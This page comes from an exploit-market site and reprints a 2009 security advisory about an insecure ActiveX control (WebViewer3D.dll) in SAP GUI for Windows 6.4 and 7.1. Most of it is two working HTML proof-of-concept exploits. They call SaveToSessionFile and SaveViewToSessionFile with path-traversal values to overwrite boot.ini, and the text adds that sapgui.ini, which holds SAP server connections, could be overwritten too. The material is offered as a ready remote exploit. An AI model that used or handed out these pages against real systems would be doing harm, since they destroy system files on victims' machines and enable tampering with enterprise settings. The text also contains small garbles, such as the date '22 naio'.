[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

EnjoySAP 6.4, 7.1 File Overwrite

Author
Sh2kerr
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-9547
Category
remote exploits
Date add
27-09-2009
Platform
unsorted
================================
EnjoySAP 6.4, 7.1 File Overwrite 
================================


# Title: EnjoySAP 6.4, 7.1 File Overwrite
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Sh2kerr
# Published: 2009-09-28
# Verified: yes


view source
print?
Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-044
 
 
Application:                    EnjoySAP, SAP GUI for Windows 6.4 and 7.1      
Versions Affected:              Tested on 7100.2.7.1038 PL 7
Vendor URL:                     http://SAP.com
Bugs:                           insecure method, File owervriting
Exploits:                       YES
Reported:                       02.07.2009
Vendor response:                02.07.2009
Date of Public Advisory:        22 naio
CVE-number:                    
Author:                         Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)
 
 
 
Description
***********
 
SAP GUI for Windows 7.1 and 6.4 contains ActiveX component EAI WebViewer3D ( file WebViewer3D.dll) Lib GUID:    {AFBBE070-7340-11d2-AA6B-00E02924C34E}
 
which is contains insecure method that can overwrite any file in system.
 
Details
*******
 
Attacker can construct html page which call one of the wulnerable functions such as:
 
1) SaveToSessionFile
2) SaveViewToSessionFile
 
from ActiveX component EAI WebViewer3D
 
 
 
Example1:
 
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>
 
 
Example2:
 
<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AFBBE070-7340-11d2-AA6B-00E02924C34E}"></object>
<SCRIPT>
function Do_1t()
 {
   File = "../../../../../../../../../../../../boot.ini"
   ctrl.SaveViewToSessionFile(File)
 }
</SCRIPT>
<input language=JavaScript onclick=Do_1t() type=button value="P0c">
</BODY>
</HTML>
 
 
 
 
For example we can overwrite boot.ini file or  sapgui.ini which contains all connectionbs to sap servers
 


#  0day.today [2024-12-25]  #